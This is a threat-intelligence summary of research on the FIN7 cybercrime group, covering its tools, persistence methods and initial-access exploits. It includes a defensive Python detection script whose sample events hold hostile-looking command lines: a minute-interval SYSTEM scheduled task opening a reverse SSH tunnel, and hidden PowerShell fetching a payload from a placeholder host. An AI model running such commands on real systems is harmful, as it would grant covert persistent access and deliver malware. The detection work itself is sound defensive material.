2024-07-25

FIN7’s Evolving Arsenal of Persistent Threats and Evasive Malware

Level: Tactical | Source: SentinelOne | Global


SentinelOne offensive security researcher Antonio Cocomazzi unravels the threat presented by FIN7, also known as Carbon Spider or Sangria Tempest, a notorious financially motivated threat group active since 2012. Tracing FIN7's activity is crucial given the wide range of sectors the group has targeted globally, including hospitality, energy, finance, manufacturing, high-tech, and retail. FIN7's roots are traced back to Russia. Initially, the group specialized in point-of-sale (POS) malware for financial fraud but shifted to ransomware operations around 2020, affiliating with groups like REvil and Conti. SentinelOne reports that FIN7 has also launched its own ransomware-as-a-service (RaaS) programs linked to names such as Darkside and BlackMatter. Notably, FIN7 has been linked to Black Basta ransomware and has established fraudulent infosec firms such as Combi Security and Bastion Secure to facilitate their attacks. Their proficiency in selling malware on underground forums further exemplifies their expertise in cybercriminal activities.

FIN7 employs a diverse toolkit, including Powertrash, Diceloader, Core Impact, an SSH-based backdoor, and AvNeutralizer, alongside the PowerShell and BAT scripts central to their operations. For instance, the installation script for their SSH-based backdoor, "install.bat," creates multiple scheduled tasks to establish and maintain an SSH tunnel persistently. These scheduled tasks execute commands that run the SSH daemon and establish reverse SSH tunnels to remote servers, ensuring constant connectivity. Key flags in these commands include scheduling the tasks to run every minute (/sc minute /mo 1), running them under the NT AUTHORITY\SYSTEM account (/RU "NT AUTHORITY\SYSTEM"), and setting up port forwarding (the -R and -D flags) to provide encrypted, persistent access. Cocomazzi reports that "given the nature of the targeted company, the group’s intention was to establish a covert and persistent access for future espionage operations."

AvNeutralizer, another tool in FIN7's arsenal, is specifically designed to disable endpoint security solutions. Recent iterations of AvNeutralizer use a combination of drivers and operations to create a failure in some specific implementations of protected processes, ultimately leading to a denial of service condition, explains Cocomazzi. This driver-based technique allows FIN7 to bypass defenses by exploiting legitimate system drivers. AvNeutralizer's effectiveness has made it a valuable tool marketed in underground forums, used by multiple ransomware groups, including Black Basta, AvosLocker, MedusaLocker, and LockBit.

FIN7's campaigns also involve exploiting vulnerabilities such as ProxyShell (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207) to gain initial access. Following successful exploitation, they utilize PowerShell droppers to deliver payloads like Powertrash and Diceloader. For example, SQL injection attacks on public-facing applications result in sqlservr.exe spawning cmd and PowerShell processes that download and execute malicious implants. These implants facilitate further compromise, including establishing persistent access, executing payloads, and exfiltrating data.
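A defender-side check for the two behaviours described above (a minute-interval SYSTEM scheduled task wrapping an ssh -R/-D tunnel, and sqlservr.exe spawning cmd or PowerShell), written as an added example that is not code from the SentinelOne report or from Anvilogic; the process-creation events, file paths and addresses below are constructed for illustration:

```python
import re
from typing import Dict, List, Tuple

# Constructed Sysmon-style process-creation events (not from the report).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /tn "Ssh Update" /sc minute /mo 1 '
                r'/RU "NT AUTHORITY\SYSTEM" /tr "C:\ProgramData\ssh.exe -N '
                r'-R 2222:127.0.0.1:22 op@198.51.100.7"'},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /tn "Backup" /sc daily /st 02:00 '
                r'/tr "C:\Tools\backup.exe"'},
    {"parent": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd /c powershell -nop -w hidden -c "iwr http://198.51.100.7/x"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd /c dir"},
]

# Flag combinations the report calls out: every-minute repeat, SYSTEM account,
# and an ssh invocation carrying a reverse (-R) or dynamic (-D) forward.
SCHTASKS_CREATE = re.compile(r"\bschtasks(\.exe)?\b.*?/create\b", re.I)
EVERY_MINUTE = re.compile(r"/sc\s+minute\b.*?/mo\s+1\b", re.I)
SYSTEM_ACCOUNT = re.compile(r'/RU\s+"?(NT AUTHORITY\\)?SYSTEM"?', re.I)
SSH_TUNNEL = re.compile(r"\bssh(\.exe)?\b.*\s-(R|D)\s", re.I)
SHELLS = ("cmd.exe", "powershell.exe", "pwsh.exe")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def is_persistent_ssh_tunnel_task(cmdline: str) -> bool:
    """schtasks /create that runs an ssh -R/-D tunnel every minute as SYSTEM."""
    if not SCHTASKS_CREATE.search(cmdline):
        return False
    return all(p.search(cmdline) for p in (EVERY_MINUTE, SYSTEM_ACCOUNT, SSH_TUNNEL))


def is_sqlservr_spawning_shell(event: Dict[str, str]) -> bool:
    """SQL Server process launching a command shell, as after SQL injection."""
    return basename(event["parent"]) == "sqlservr.exe" and basename(event["image"]) in SHELLS


def triage(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (rule_name, command line) for every event matching a rule."""
    hits = []
    for e in events:
        if is_persistent_ssh_tunnel_task(e["cmdline"]):
            hits.append(("persistent_ssh_tunnel_task", e["cmdline"]))
        if is_sqlservr_spawning_shell(e):
            hits.append(("sqlservr_spawns_shell", e["cmdline"]))
    return hits
```

Legitimate every-minute SYSTEM tasks exist, so the ssh -R/-D requirement is what keeps the first rule precise; tune the parent list for the second rule to the SQL Server build in your environment.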

FIN7's continuous evolution and innovative techniques highlight their technical expertise and adaptability. As the SentinelOne report puts it: "FIN7’s continuous innovation, particularly in its sophisticated techniques for evading security measures, showcases its technical expertise. The group’s use of multiple pseudonyms and collaboration with other cybercriminal entities makes attribution more challenging and demonstrates its advanced operational strategies." The group's ongoing development and sale of tools like AvNeutralizer demonstrate the significant threat they pose in the cybercrime landscape.
